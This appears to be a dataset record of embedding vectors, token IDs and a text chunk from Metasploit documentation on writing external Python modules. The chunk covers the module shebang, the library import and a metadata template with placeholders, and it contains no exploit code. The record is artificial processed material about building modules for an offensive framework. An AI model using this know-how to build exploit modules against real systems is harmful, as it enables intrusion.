-0.5242071151733398, -0.029721112921833992, -0.6909695267677307, -0.030019886791706085, -0.09192569553852081, -0.3735794425010681, 0.4951840937137604, -1.1321221590042114, -0.7457217574119568, -0.4478038251399994, 0.5893654823303223, 0.8458376526832581, 1.0599385499954224, 0.1894194334745407, -0.33871927857398987, -0.1827825903892517, 0.011255583725869656, 0.526380717754364, -0.49305981397628784, -0.1328963190317154, -0.5913156270980835, 0.8988660573959351, -0.005686613265424967, 0.3797420263290405, -0.4194676876068115, 0.15203668177127838, 0.08367103338241577, 0.38355472683906555, -0.038980916142463684, 0.2623538076877594, -0.879993736743927, 0.04406075179576874, 0.44899481534957886, -0.01778618060052395, -0.010896032676100731, 0.19295041263103485, -0.5372803211212158, 0.4558121860027313, 0.5418006777763367, -0.49328747391700745, 0.06168421730399132, 0.14122138917446136, -0.6474564671516418, -0.13064001500606537, -0.4632185995578766, -0.8336626291275024, -0.5369822978973389, -0.18173490464687347, 0.1415814459323883, 0.5925188660621643, 0.37940773367881775, 0.12264534831047058, 0.15341752767562866, -0.49475347995758057, 0.4121640622615814, -0.40877971053123474, -0.5622895956039429, -0.6789811253547668, 0.02308415248990059, -0.05549025163054466, 0.6861584186553955, 0.06225282698869705, -0.471971333026886, -0.027945062145590782, 0.6877278089523315, -0.153256356716156, -0.04494200646877289, -0.15313267707824707, 0.3228990137577057, 0.15272723138332367, 0.058264728635549545, -0.1384391486644745, 0.12615860998630524, -0.3056949973106384, 0.0942845344543457, -0.09953580796718597, 0.21814627945423126, -0.6846804618835449, -0.07188083231449127, 0.7740303874015808, -0.2353418618440628, -0.3328491747379303, 0.7887421250343323, 0.484761118888855, -0.45134708285331726, 0.16402117908000946, -0.055173877626657486, -0.18367835879325867, -0.06563865393400192, -0.7343679666519165, -0.13224034011363983, 0.08872143179178238, 0.18563026189804077, -0.03376447781920433, -0.7715891599655151, 0.7584771513938904, 0.3811599016189575, -0.7283329963684082, -0.17603535950183868, -1.106137990951538, -0.1167588084936142, 0.32272636890411377, -0.09052383899688721, 0.21435518562793732, -0.6452695727348328, -1.0618877410888672, -0.23654140532016754, -0.16643230617046356, -0.2654678523540497, -0.6308037042617798, 0.4701530933380127, -0.980376660823822, 0.4494633972644806, -0.028917450457811356, 0.39871782064437866, 0.389891654253006, -0.9855895042419434, 0.17635829746723175, -0.3316953778266907, 0.14636792242527008, -0.30370792746543884, -0.04770174250006676, -0.037563078105449677, -0.36941254138946533, -0.49173635244369507, -0.003942602314054966, -0.48586931824684143, 0.2542663514614105, 0.5334457159042358, -0.36139926314353943, 0.6713724136352539, -0.159415140748024, -0.8918509483337402, 0.6116912961006165, 0.39719754457473755, -1.0865110158920288, -0.614300549030304, 0.08411062508821487, 0.11929786950349808, 0.7414515018463135, 0.1625068336725235, -0.6200529932975769, -0.5687819123268127, -0.2107408046722412, -0.09195171296596527, -0.42747828364372253, -0.3929167091846466, -0.5734266638755798, -0.02311483956873417, -0.5529297590255737, 0.47703465819358826, 0.6908207535743713, -1.0302157402038574, 0.1195901557803154, -0.16153351962566376, 1.2159942388534546, -0.5341086983680725, -0.02850198745727539, -0.3838920593261719, -0.14924801886081696, 0.10053613036870956, 1.1389744281768799, -0.1542547196149826, 0.1223960742354393, -0.30415868759155273, 0.5457983016967773, -0.08636966347694397, 0.519491970539093, -0.29058021306991577, -0.15985792875289917, -0.1072412058711052, -0.13346433639526367, -0.23726920783519745, 0.24952350556850433, -0.11658154428005219, 0.6044842600822449, -0.10852324217557907, 0.8292995691299438, -0.3753833770751953, 0.16214759647846222, -0.4250505268573761, 1.0289019346237183, 0.7257106900215149, -0.30328166484832764, -0.11759953945875168, -0.236352801322937, 0.1425456702709198, -0.4176885187625885, -0.35673022270202637, 0.027904348447918892, 0.11586545407772064, -0.795011043548584, -0.6820753216743469, 0.8274229168891907, -0.15129299461841583, 0.23749956488609314, 0.1747855693101883, 0.1510457694530487, 0.4401453137397766, -0.38213175535202026, 0.10880076885223389, 1.449053168296814, 0.2351432591676712, -0.2438162863254547, -0.696755588054657, 0.21838246285915375, 0.679713249206543, -0.15478281676769257, 0.46471846103668213, 0.06052352115511894, -0.43795046210289, 0.037265628576278687, -0.21557365357875824, -0.41864311695098877, -0.31817740201950073, 0.4396992325782776, 0.7820337414741516, -0.16279816627502441, -0.14873887598514557, -0.4596850574016571, -0.8451298475265503, 0.015991849824786186, 0.39688655734062195, 0.1304379552602768, -0.029303941875696182, 0.27283337712287903, 1.1937144994735718, 0.8204315304756165, -0.0783982053399086, -0.24128107726573944, -0.18796630203723907, -0.6268391013145447, 0.5025975704193115, 0.15895047783851624, -0.1645122468471527, 0.5274690985679626, 0.8617728352546692, -0.6933598518371582, -0.7071880102157593, -1.0923033952713013, -0.00404595211148262, -0.06422542035579681, -0.24973712861537933, -0.7967713475227356, 0.8866032361984253, -0.15198971331119537, 0.2453642636537552, 0.4113605320453644, -0.22814571857452393, 0.17610026895999908, -0.8223799467086792, -0.025202877819538116, -0.05911599099636078, 0.7978015542030334, 0.7803323864936829, -0.08917902410030365, -0.25829845666885376, -0.1099361702799797, 0.4155368506908417, -0.9183168411254883, 0.32329002022743225, 0.8266370296478271, -0.013331353664398193, -0.09027791768312454, 0.33724769949913025, 0.4958878457546234, 0.3193231225013733, 0.018957238644361496, 0.1765977293252945, 0.5711703300476074, -1.0222032070159912, -0.25981757044792175, -0.3106420934200287, -0.22018089890480042, 0.23352892696857452, 0.14287108182907104, -0.03832513839006424, 0.6065465211868286, 0.6653889417648315, -0.15886671841144562, 0.43429356813430786, -1.38833487033844, 0.7073673009872437, -1.0322043895721436, -0.13682323694229126, -0.9692784547805786, -0.24544788897037506, 0.32744765281677246, -0.39594000577926636, -0.8616700768470764, -0.7589346766471863, -0.7582093477249146, 0.07225324958562851, 0.32789915800094604, -0.3829685151576996, -0.8142090439796448, 0.21916629374027252, -1.2735646963119507, -0.7637343406677246, -0.6328911781311035, -0.36938726902008057, -0.3389880061149597, -0.34346550703048706, -0.4396413564682007, -0.28586477041244507, 0.06309688836336136, 0.40875929594039917, 0.058991044759750366, -0.0964551493525505, -0.4660952091217041, 0.06598244607448578, -0.2995545566082001, -0.5406680703163147, -0.563563346862793, 0.3673124313354492, 0.4202306568622589, -0.31953585147857666, 1.069930076599121, 0.3390534818172455, -0.1599988043308258, -0.3454253077507019, -0.06728316098451614, -0.038546234369277954, -0.5884814262390137, -1.0306353569030762, -0.09845103323459625, 0.05369596555829048, -0.41177818179130554, 0.007963146083056927, -0.8604727983474731, -0.6364296674728394, 0.442687064409256, 0.2769675850868225, -0.08708489686250687, 0.19119976460933685, 0.17413495481014252, -0.4655705690383911, 0.10881201177835464, 0.8301123976707458, 0.4788624346256256, 0.8771570920944214, -0.8031806945800781, 0.5039463043212891, -0.24481572210788727, -0.23962868750095367, 0.45525240898132324, 0.32674261927604675, -0.21155114471912384, 0.7677978873252869, -0.12244220077991486, 0.4176074266433716, 0.020909437909722328, -0.23878929018974304, -0.5210846066474915, 0.2048977017402649, 0.5548450350761414, -0.1073668971657753, -0.33431148529052734, -0.5569657683372498, 0.3960952162742615, -0.327919602394104, -0.3419574201107025, -0.21592913568019867, 0.4585404694080353, -1.0501708984375, 0.5319969058036804, -0.06051768362522125, 0.07647019624710083, 0.01965135894715786, 0.00787730049341917, 0.2850397527217865, 0.6265422701835632, -0.27399131655693054, 0.07941941916942596, 0.5428298115730286, -1.2439346313476562, -0.22547170519828796, -0.2519415318965912, 0.011272379197180271, -0.6590540409088135, -0.5764036774635315, 0.20889726281166077, 1.2429931163787842, 0.18089988827705383, -0.04741734638810158, 0.18904705345630646, -0.46124041080474854, -0.3683309257030487, 0.7138059139251709, -0.400091290473938, 0.1548522263765335, -0.49248117208480835, 0.002078555291518569, 0.2600725591182709, 0.7315221428871155, -0.6019612550735474, 0.28578370809555054, -0.5680975914001465, -0.6408833265304565, 0.3159521520137787, 0.6167721152305603, -0.6531892418861389, 0.6244719624519348, 0.375594824552536, 0.06838584691286087, 0.3980649709701538, -0.3171619772911072, -0.3805944323539734, 0.2841259837150574, -0.25416722893714905, 0.48267659544944763, 1.0618635416030884, -0.3019639551639557, 0.9679928421974182, 0.010855826549232006, -0.3930927515029907, -0.08686016499996185, 0.41500696539878845, -0.19666752219200134, -0.5021001100540161, 0.2361600399017334, -0.22339290380477905, -0.012511273846030235, -0.29929909110069275, -0.41836896538734436, 0.8468431234359741, -0.45314374566078186, 0.4380834102630615, -0.42130738496780396, -0.13962125778198242, 0.9980661869049072, -0.8486272096633911, -0.03949573636054993, 0.07868976145982742, -0.44043928384780884, 1.1137796640396118, 0.3281787633895874, -0.21603313088417053, 1.0551402568817139, 0.6479021906852722, 0.6729381680488586, -0.6018649339675903, -0.09306106716394424, 0.09988788515329361, 0.43479812145233154, -0.3503377437591553, -0.05863872542977333, -0.3913976848125458, 0.5452555418014526, -0.13374122977256775, -0.37745824456214905, -0.4315149188041687, -0.3238754868507385, 0.18592169880867004, 0.07695098221302032, -0.22995539009571075, -0.33137235045433044, -0.09692241996526718, -1.0796018838882446, 0.20476034283638, -0.9303308129310608, 0.41947540640830994, 0.4642188251018524, -0.23776046931743622, -0.5019907355308533, 0.9943487644195557, -0.12103535234928131, 0.7250545620918274, 0.2846665382385254, 1.3528372049331665, 0.24131587147712708, 0.17555473744869232, 0.8218304514884949, -0.5601181983947754, 0.21506991982460022, 0.0407743938267231, -0.2491094172000885, 0.5023366808891296, 0.12867741286754608, -0.3622666299343109, 0.33623331785202026, -0.5728553533554077, -0.8616925477981567, 0.004359859973192215, 0.15756669640541077, -0.16769438982009888, -0.29297083616256714, 0.2120015174150467, 0.14118313789367676, -0.5555111765861511, -0.13865455985069275, 0.6533546447753906, 0.32377466559410095, 0.04080234467983246, -0.3527679145336151, 0.24072842299938202, -1.231964111328125, 0.09037508070468903, -0.7526547908782959, 0.502615213394165, -0.07034523040056229, -0.05500130355358124, 0.058142516762018204, -0.8046854734420776, 0.4148101806640625, -0.2205723226070404, -0.6596728563308716, 0.1462724655866623, 0.10946816205978394, -0.5065481066703796, 0.5862711668014526, -0.5086773633956909, -0.6477621793746948, -0.3422697186470032, 0.48556676506996155, 1.0650264024734497, 0.18175625801086426, 0.7198031544685364, 0.5826447606086731, -0.044466614723205566, 0.3312811851501465, -0.3931812345981598, -0.09510602802038193, -0.11243700981140137, -0.486499547958374, -0.2692432105541229, 0.09935089200735092, -0.615591287612915, -1.224424958229065, -0.5702790021896362, 0.9268462061882019, 0.44392016530036926, -0.04449990391731262, -0.21086439490318298, -0.7117878198623657, -0.9307937622070312, -0.46851277351379395, -0.7472544312477112, -0.8628659248352051, -0.6159157752990723, -0.7282035946846008, 0.20295020937919617, -0.7550955414772034, 4.304731369018555, 0.6935271620750427, 0.4136977791786194, 0.7716889381408691, -0.24057906866073608, 0.4308145344257355, 0.1685524433851242, 0.04444055259227753, 0.07381794601678848, -0.8440660834312439, 0.6467168927192688, 0.39873024821281433, -0.07429879158735275, 0.8000485897064209, 0.14506514370441437, 0.6909854412078857, -1.0442578792572021, -0.334803968667984, -0.1009652391076088, -0.753757655620575, -1.3025774955749512, 0.33010464906692505, -0.7322173714637756, 0.661130428314209, 0.3130148649215698, 0.32125139236450195, -0.30656787753105164, 0.22908766567707062, 0.7725325226783752, -0.544887363910675, -0.09450345486402512, -0.16833262145519257, 1.024727463722229, -0.3112765848636627, 0.44388797879219055, 0.05708998069167137, -0.12359298765659332, -0.21662482619285583, -0.10941964387893677, -0.3736911118030548, 0.8006554245948792, 0.053038664162158966, -0.38334909081459045, 0.08410695940256119, 0.11372057348489761, 0.6208963990211487, -0.08932630717754364, 0.3293282389640808, 0.8456565141677856, -0.32614442706108093, 0.49082523584365845, -0.31357795000076294, 0.5501924753189087, -0.5881361365318298, -0.7368226051330566, -0.5442246198654175, -0.12621501088142395, -0.5509620308876038, 0.1474953442811966, -0.31106671690940857, 0.2630406320095062, 0.5764298439025879, -0.2800820767879486, 0.36017724871635437, 0.1322377473115921, 0.6680970191955566, -0.2667110860347748, 0.607479453086853, -0.7342592477798462, 0.1520790457725525, -0.363066703081131, 0.2619389295578003, -0.2184901386499405, -1.178841233253479, -0.34565767645835876, 0.48768341541290283, 0.29147547483444214, -0.03391803428530693, 0.7268837094306946, -0.6196710467338562, 0.5863029956817627, -0.3174174726009369, -0.1778295636177063, -0.8082589507102966, 0.3031215965747833, 0.372481107711792, -0.4824323058128357, -0.15837909281253815, 0.20979353785514832, -0.32710352540016174, 0.5732463002204895, 0.7008645534515381, -0.9401331543922424, -0.25886061787605286, 0.3313679099082947 ]
[ 101, 8020, 14184, 1999, 2175, 2064, 2022, 4719, 1999, 1037, 2261, 3722, 4084, 2004, 14801, 2917, 1012, 2004, 2005, 3569, 2175, 2544, 1010, 2057, 2031, 7718, 2007, 1015, 1012, 2340, 1012, 1016, 1010, 2053, 5763, 2005, 2544, 1016, 1012, 1015, 1012, 5269, 12260, 6593, 1996, 6413, 11336, 4130, 2241, 2006, 1996, 2828, 1997, 11336, 2017, 2024, 2667, 2000, 9002, 4783, 2469, 2000, 2421, 6413, 11336, 12653, 2104, 2182, 22199, 2115, 12653, 2003, 6149, 2011, 23448, 18558, 1011, 1040, 1016, 1012, 7781, 2378, 20464, 12672, 2023, 2240, 2012, 1996, 2327, 1997, 2115, 11336, 1024, 1013, 1013, 2149, 2099, 1013, 8026, 1013, 4372, 2615, 2175, 2448, 1000, 1002, 1014, 1000, 1000, 1002, 1030, 1000, 1025, 6164, 1000, 1002, 1029, 1000, 5676, 2115, 5371, 2003, 2019, 4654, 8586, 23056, 5371, 1017, 1012, 16437, 5498, 20925, 4697, 2115, 11336, 2007, 1996, 11336, 27425, 1024, 12324, 1000, 18804, 13102, 4135, 4183, 1013, 11336, 1000, 4569, 2278, 2364, 1006, 1007, 1063, 27425, 1024, 1027, 1004, 11336, 1012, 27425, 1063, 2171, 1024, 1000, 1026, 11336, 2171, 1000, 1010, 6412, 1024, 1000, 1026, 6235, 1028, 1000, 1010, 6048, 1024, 1031, 1033, 5164, 1063, 1000, 1026, 3166, 1015, 1028, 1000, 1010, 1000, 1026, 3166, 1016, 1028, 1000, 1065, 1010, 3058, 1024, 1000, 1026, 3058, 11336, 2517, 1000, 1010, 2828, 1024, 1000, 1026, 11336, 2828, 1028, 1000, 1010, 21598, 1024, 1026, 2995, 1064, 6270, 1028, 1010, 7604, 1024, 1031, 1033, 11336, 1012, 4431, 1063, 1065, 1010, 7047, 1024, 4949, 1031, 5164, 1033, 11336, 1012, 5724, 1063, 1000, 1026, 5724, 1015, 1000, 1024, 1063, 2828, 1024, 1000, 1026, 2828, 1028, 1000, 1010, 6412, 1024, 1000, 1026, 6412, 1028, 1000, 1010, 3223, 1024, 1026, 2995, 1064, 6270, 1028, 1010, 12398, 1024, 1000, 1026, 12398, 1028, 1000, 1065, 1010, 1000, 1026, 5724, 1016, 1000, 1024, 1063, 2828, 1024, 1000, 1026, 2828, 1028, 1000, 1010, 6412, 1024, 1000, 1026, 6412, 1028, 1000, 1010, 3223, 1024, 1026, 2995, 1064, 6270, 1028, 1010, 12398, 1024, 1000, 1026, 12398, 1028, 1000, 1065, 1010, 1065, 1065, 11336, 1012, 1999, 4183, 1006, 27425, 1010, 1026, 1996, 4443, 4118, 2000, 2115, 11336, 1028, 1007, 1065, 2440, 2742, 22074, 1024, 2682, 2515, 2025, 12685, 1996, 2440, 4022, 2862, 1997, 27425, 7047, 10841, 14343, 20630, 3569, 11336, 4127, 1024, 6556, 1035, 18077, 28578, 12184, 1035, 18077, 1035, 4642, 2094, 1035, 2754, 18992, 13876, 5397, 1035, 8241, 12269, 7741, 2571, 1035, 26221, 7741, 2571, 1035, 3677, 1035, 8833, 2378, 1035, 26221, 12274, 7096, 2072, 1035, 26221, 1018, 1012, 4207, 3642, 29278, 3642, 2008, 2003, 4207, 3563, 2000, 2115, 11336, 3443, 1037, 14176, 1999, 2115, 11336, 14176, 1024, 4207, 1013, 5034, 2278, 1013, 18804, 13102, 4135, 4183, 2097, 8073, 5587, 2122, 2000, 1996, 2175, 15069, 29278, 3642, 2008, 2017, 2228, 2071, 2022, 2109, 2408, 14184, 1010, 5587, 3642, 2182, 2509, 4103, 2283, 5622, 5910, 4995, 1521, 1056, 2747, 3569, 2021, 2057, 6160, 13864, 1019, 1012, 2345, 4697, 22199, 2115, 4139, 5227, 16748, 3686, 1037, 4139, 5227, 3630, 16861, 3115, 2182, 1010, 2022, 2469, 2000, 2175, 16715, 2102, 102 ]
metasploit
120.txt
0
[CLS] writing python modules for metasploitthis is an example of how to write a python module for metasploit framework that uses a python metasploit library to communicate with framework via json - rpc over stdin / stdout. external python modules should support python versions 3. 5 and newer. python 2. 7 is no longer used for external modules. executioninclude this line at the top of your module : #! / usr / bin / env python3ensure your file is marked as executable python librarythe library currently supports a few function calls that can be used to report information to metasploit framework. the metasploit library can be loaded into your python module by including the following line : from metasploit import module the location of the metasploit library is automatically added to the pythonpath environment variable before the python module is executed. describe yourselfmetasploit modules include information about authors of the modules, references to other sources with information about the vulnerabilities, descriptions of the modules, options, etc. python modules need to include this metadata information as well. the structure of the data is similar to modules written in ruby. the following is an example template of metadata information : metadata = {'name':'< name > ','description':'''< description >'' ','authors': ['< author > ','< author >'],'date':'yyyy - mm - dd ','license':'< license > ','references': [ {'type':'url ','ref':'< url >'}, {'type':'cve ','ref':'yyyy - #'}, {'type':'edb ','ref':'#'}, {'type':'aka ','ref':'< name >'} ],'type':'< module type > ','options': {'< name >': {'type':'address ','description':'< description > ','required': < true / false >,'default': none },'< name >': {'type':'string ','description':'< description > ','required': < true / false >
[ 0.2918778657913208, -0.4612915515899658, -0.7055237889289856, 0.7728756070137024, -0.10334165394306183, -0.34786203503608704, 0.00839708000421524, 0.47877368330955505, 0.4144805669784546, 0.6103985905647278, 0.3328905701637268, -0.4991614520549774, 0.612960934638977, -0.044912923127412796, -0.7429777979850769, -0.4288766384124756, -0.23759643733501434, -0.47120022773742676, -0.8229698538780212, -0.15671926736831665, -0.08356262743473053, 0.024178585037589073, -0.8253892064094543, -0.558754026889801, -0.6446696519851685, 0.9081145524978638, 0.011441693641245365, -0.21896499395370483, 0.6462931036949158, 0.3110607862472534, 0.4592321515083313, -0.08632436394691467, -0.16865670680999756, -0.7764680981636047, 0.48110663890838623, -0.16088005900382996, 0.7845732569694519, -0.32849839329719543, 0.03731183707714081, -0.8526158332824707, 0.6575499176979065, 0.06873747706413269, -0.11457854509353638, -0.46991708874702454, -0.25992873311042786, -0.4474281668663025, 0.3549738824367523, 0.2660786211490631, 0.9002249240875244, 0.0038246794138103724, 0.7183367609977722, 0.5028983950614929, 0.2607439160346985, 0.43721070885658264, -0.09202919155359268, -0.15072734653949738, -0.4597441852092743, 0.014299329370260239, -0.26681050658226013, -0.04138999059796333, -0.12433233857154846, 0.7024508714675903, 0.4249331057071686, -1.0436116456985474, -0.04952207952737808, 0.20943567156791687, -0.08293243497610092, 0.08933012187480927, -0.2829148769378662, -0.46404117345809937, 0.29563525319099426, 0.9950293302536011, -0.6826344728469849, -0.7997691035270691, -0.24670293927192688, 0.36590078473091125, 0.4348394274711609, -0.4881385564804077, -0.36152055859565735, 0.5152215361595154, -0.04649176821112633, 0.4167861044406891, 0.22628246247768402, -0.3427051901817322, -0.3069111406803131, -0.7608778476715088, 0.44723013043403625, 0.21470455825328827, -0.7486567497253418, 0.5534427165985107, 0.23486661911010742, 0.3185158967971802, -0.5946499109268188, 0.32179704308509827, 0.38173699378967285, 0.33736929297447205, -0.006507726851850748, 0.24575980007648468, -0.347670316696167, -0.10299451649188995, 0.5030943155288696, 0.8393360376358032, 0.4690413177013397, 0.44681739807128906, -0.1719091236591339, 0.2959970235824585, 0.8536480069160461, -0.2471284419298172, -0.3450852632522583, -0.18037720024585724, 0.47778716683387756, -0.125471293926239, 0.22921405732631683, -0.5566579103469849, 0.10670842230319977, 0.5941292643547058, 0.6430971026420593, -0.21019691228866577, -0.375724196434021, 0.49395060539245605, 0.09849084913730621, -0.11853761970996857, -0.21346206963062286, -0.6057028770446777, -0.033364929258823395, 0.17078711092472076, 0.6277890205383301, 0.3480048179626465, -0.5184388160705566, -0.5950877070426941, -0.149392768740654, -0.05813388526439667, -0.025471292436122894, 0.6156758666038513, -0.05373444780707359, 0.30215227603912354, -0.31417325139045715, 0.15324664115905762, 1.033067226409912, -0.7379379272460938, 0.3311464488506317, 0.010342981666326523, 0.2419794499874115, 1.0508445501327515, -0.017641598358750343, -0.5165328979492188, -0.6207956671714783, -0.37004539370536804, 0.026166899129748344, 0.557921290397644, -0.07283934205770493, -0.1182786300778389, 0.5627037882804871, -0.6660391688346863, 0.05151265487074852, -0.25119102001190186, -0.8294869661331177, 0.4514146149158478, 0.1681165099143982, 0.4836288392543793, 0.03789043053984642, 1.190449833869934, -0.684990644454956, 0.35200414061546326, -0.31338101625442505, 0.4212821424007416, -0.7367489337921143, -0.5078321099281311, -0.6969785690307617, -0.09817866235971451, 0.1840120553970337, -0.08784162253141403, 0.2758731544017792, 0.2897832691669464, 1.6989200115203857, 0.27920088171958923, 0.07794927805662155, -0.4638946056365967, 0.24805471301078796, 0.8398915529251099, -0.5364888906478882, 0.69964599609375, 0.44906312227249146, 0.8039578199386597, 0.12047849595546722, 0.1635984480381012, 0.0672646313905716, -0.7851434946060181, -0.20754492282867432, -0.4439994692802429, -0.1259167492389679, 0.19974607229232788, -0.33202818036079407, 0.5698643326759338, 0.35101768374443054, -0.20244275033473969, -0.9272962808609009, 0.03392721340060234, 0.28638917207717896, -1.1762415170669556, -0.7101568579673767, 0.6803244352340698, -0.36998382210731506, 0.579681396484375, -0.6087425351142883, -0.008660858497023582, 0.7500569224357605, 0.6372795104980469, 0.1950387805700302, 0.8552655577659607, 1.0514552593231201, -0.4403223991394043, -0.6106773018836975, -0.2589498460292816, 0.023031383752822876, -0.3828326165676117, -0.6721795797348022, 0.6415976881980896, -0.12872479856014252, -0.12995046377182007, -0.0658850446343422, 0.28104379773139954, 0.7059164643287659, 0.0011254326673224568, -0.5229452848434448, -0.6873863339424133, 0.41473281383514404, 0.20090243220329285, -0.41141051054000854, 0.1054067462682724, 0.2803839445114136, 0.6082396507263184, 0.829528272151947, 0.9124776124954224, 0.0960952565073967, -0.06709529459476471, 0.4424866735935211, 0.42514732480049133, 0.05426421016454697, -0.01440228521823883, 0.0035601919516921043, 0.5563452243804932, 0.2727762460708618, 0.7924519777297974, 0.11435060203075409, 0.34132981300354004, 0.002446011872962117, 0.31878066062927246, -0.23911933600902557, 0.5841018557548523, -0.42661094665527344, 1.1965724229812622, 0.37681612372398376, -0.745987057685852, -0.9041885733604431, -0.6561887860298157, 0.3290698230266571, 0.6919897198677063, -0.47921445965766907, -0.21669694781303406, 0.1873127520084381, 0.0007490749703720212, -0.7684437036514282, 0.13317391276359558, 0.21426886320114136, 0.3684900403022766, 0.09791269898414612, 0.14270325005054474, 0.1374957412481308, -0.33906593918800354, -0.41762271523475647, -0.23663504421710968, -0.7450764775276184, -0.8038577437400818, -0.3919229805469513, -0.025932252407073975, -0.3676079511642456, -0.118083655834198, 0.3572545051574707, -0.0257126297801733, -0.6928055882453918, 0.0035350085236132145, 0.42355769872665405, 0.5568270087242126, 0.03737843781709671, -0.6948649287223816, -0.7286716103553772, -0.1496792882680893, -0.3876784145832062, 0.6675834059715271, -0.6110543012619019, -0.16931723058223724, -0.46587032079696655, 0.07683619856834412, 0.07816153764724731, 0.11360431462526321, 0.753327488899231, -0.01831432804465294, 0.037818118929862976, 0.2620888650417328, -0.10974278301000595, 0.4672735929489136, 0.6109455823898315, -0.38168013095855713, -0.4934955835342407, 0.25653693079948425, -0.08183619379997253, 0.14763788878917694, 0.8410239219665527, 0.6030077338218689, -0.8788476586341858, 0.8356568813323975, -0.28769251704216003, 0.43582144379615784, -0.8356020450592041, 0.2986171841621399, 0.17390677332878113, 0.394898921251297, -0.06541603058576584, -0.34186485409736633, -0.021407945081591606, -0.3148878514766693, 0.0038214547093957663, -0.2240135371685028, -0.4680885672569275, 0.5419656038284302, 0.48377731442451477, -1.091092824935913, 0.7221598029136658, -0.6627615690231323, -0.26280397176742554, -0.04085492342710495, 0.16462190449237823, 0.875373125076294, 0.23025918006896973, 0.45832517743110657, -0.7342132329940796, 0.06832898408174515, -0.2932594120502472, -0.1869862675666809, 0.0556376613676548, -0.34361010789871216, 0.723626971244812, 0.08004304021596909, -0.28992751240730286, 1.0848848819732666, 0.7089465856552124, -0.12216103821992874, -0.40765252709388733, -0.2907756567001343, -0.5008128881454468, -0.0576474629342556, 0.6818422675132751, 0.3475978672504425, 0.04721517488360405, 1.0215927362442017, -0.42764633893966675, -0.1442662477493286, 0.6971030831336975, 0.47978541254997253, 0.04893418028950691, 0.6772785782814026, 0.1974288821220398, -0.2645259201526642, -0.6288031935691833, -0.5513784289360046, -0.12420738488435745, 0.4224987328052521, 0.1984308958053589, -0.044998664408922195, 1.0271800756454468, -0.31824055314064026, -0.2767910957336426, 0.368218332529068, 0.02951594814658165, -0.45119595527648926, 0.35161805152893066, 0.07479692995548248, 0.388969361782074, -0.2496190369129181, 0.20049235224723816, -0.06316695362329483, -0.047921210527420044, 0.25132402777671814, 0.04753842204809189, -0.11693625152111053, -0.1604933887720108, -0.5316672325134277, -0.0750826746225357, -0.30954626202583313, -0.20599748194217682, -0.1313878297805786, 0.4465221166610718, -0.32720258831977844, -0.8234442472457886, 0.04542098566889763, 0.3771497309207916, 1.0341765880584717, 0.2033863663673401, 0.6954066753387451, 0.7247201800346375, 0.32661357522010803, -0.5751720070838928, 0.4278123676776886, -0.12449884414672852, 0.5091384053230286, -0.20579476654529572, 0.49469193816185, -0.054492101073265076, 0.49260765314102173, -0.09525585174560547, -0.05113480985164642, -0.49899473786354065, 0.03335706517100334, -0.20198553800582886, -0.27234476804733276, -0.9753398895263672, -0.5068168640136719, 0.5734413862228394, -0.14525778591632843, -0.20148955285549164, -0.4650372266769409, 0.018281325697898865, 0.43664032220840454, 0.7764939665794373, -0.8070949912071228, 0.026313936337828636, -0.3979262709617615, -0.2196519821882248, -0.36536648869514465, 0.34737512469291687, -0.251321017742157, -0.7650933861732483, 0.10568457841873169, -0.7841274738311768, 0.42651763558387756, 0.2784830629825592, -0.13727699220180511, 0.2330400049686432, -1.2164212465286255, -0.04864834249019623, -0.06136644259095192, -0.8621581792831421, -0.9552037119865417, -0.22487647831439972, 0.4135974049568176, 0.634436309337616, 0.007958194240927696, -0.5301894545555115, -0.46768081188201904, 0.7248038649559021, -0.4317091703414917, 0.6795130372047424, -0.7149995565414429, 1.0341278314590454, 0.28571391105651855, -0.6021654009819031, 0.10689237713813782, 0.10454809665679932, -0.30978918075561523, -0.16195443272590637, -0.23538565635681152, 0.0038988119922578335, -0.6738364100456238, -0.06771539151668549, 0.5702596306800842, 0.12347044050693512, -0.15274128317832947, 0.5303519368171692, -0.04851295426487923, -0.644715428352356, 0.3813766837120056, -0.032142143696546555, -0.11942721903324127, -0.07072130590677261, -0.942966878414154, 0.3397034704685211, 0.37197980284690857, -0.1932823657989502, 0.6009004712104797, -0.36715638637542725, 1.148072600364685, 0.4998929500579834, 0.14645403623580933, -0.8619920611381531, -0.8423608541488647, 0.18681766092777252, 0.3458830416202545, -0.36095255613327026, 0.5915525555610657, -0.23250380158424377, -0.2657870054244995, -0.20248037576675415, 0.05313804745674133, -0.49383309483528137, -1.1059585809707642, 0.4744265675544739, -0.08583531528711319, 0.494942843914032, -0.15875054895877838, 0.356091171503067, -0.20010511577129364, -0.5278967022895813, 0.9739863276481628, -1.0542134046554565, -0.016526544466614723, -1.0421266555786133, -0.3349781036376953, -0.5347175598144531, -0.08658803999423981, -0.13033077120780945, -0.2519635260105133, -0.4610671401023865, -0.1849934607744217, -0.23786379396915436, 0.38483068346977234, 0.2960394322872162, -0.15607385337352753, -0.6134641766548157, 0.9466701149940491, 0.041446249932050705, -0.45594361424446106, -0.24328236281871796, 0.5145665407180786, -0.37000665068626404, -0.10616355389356613, 0.019826240837574005, -0.14268220961093903, -1.079456090927124, -0.6015362739562988, 0.06884617358446121, 0.014339910820126534, 0.5849302411079407, -0.5553323030471802, -0.7161118388175964, -0.3078642189502716, 0.18313544988632202, 0.0685245618224144, -1.4296773672103882, -0.10735651105642319, -0.10709518194198608, 1.0460489988327026, -0.10615664720535278, -0.5377393960952759, -0.4104766845703125, -0.7458992004394531, -0.33873501420021057, 0.6615729331970215, 0.39724016189575195, -0.09949098527431488, -0.15672893822193146, -0.4136430621147156, 0.08990691602230072, 0.5041996836662292, -0.6073724627494812, -0.4885329008102417, 0.13380414247512817, 0.20460206270217896, -0.2656099200248718, 0.7288066744804382, -0.22008587419986725, 0.5054275989532471, -0.5010942816734314, 0.610127329826355, -0.5203614830970764, -0.3189016580581665, -0.28232288360595703, 0.163527712225914, 1.0625042915344238, -0.0601758249104023, -0.7314857840538025, -0.3194774389266968, 0.8899060487747192, 0.5861626863479614, -0.12595711648464203, -0.16923411190509796, 0.6150075197219849, -0.9558666944503784, -1.0515539646148682, 0.6115697622299194, -0.4239535927772522, -0.6827477812767029, 0.33089229464530945, 0.07466413080692291, 0.893060028553009, -0.19763903319835663, 0.7315896153450012, 0.6705030798912048, -0.07416050881147385, 0.12286289036273956, -0.5020514130592346, 0.46732932329177856, 0.24193184077739716, 0.12487631291151047, 0.9587999582290649, 0.057806596159935, 0.5470628142356873, -0.09439307451248169, -0.059182509779930115, -0.5115471482276917, -0.41671469807624817, -0.7641710638999939, 1.0061591863632202, -0.7099737524986267, 0.189602330327034, -0.2573317289352417, -1.013304591178894, -0.21656855940818787, -0.17865298688411713, -0.18906351923942566, -0.3074696362018585, 0.2324558049440384, 0.45325231552124023, 0.35331785678863525, 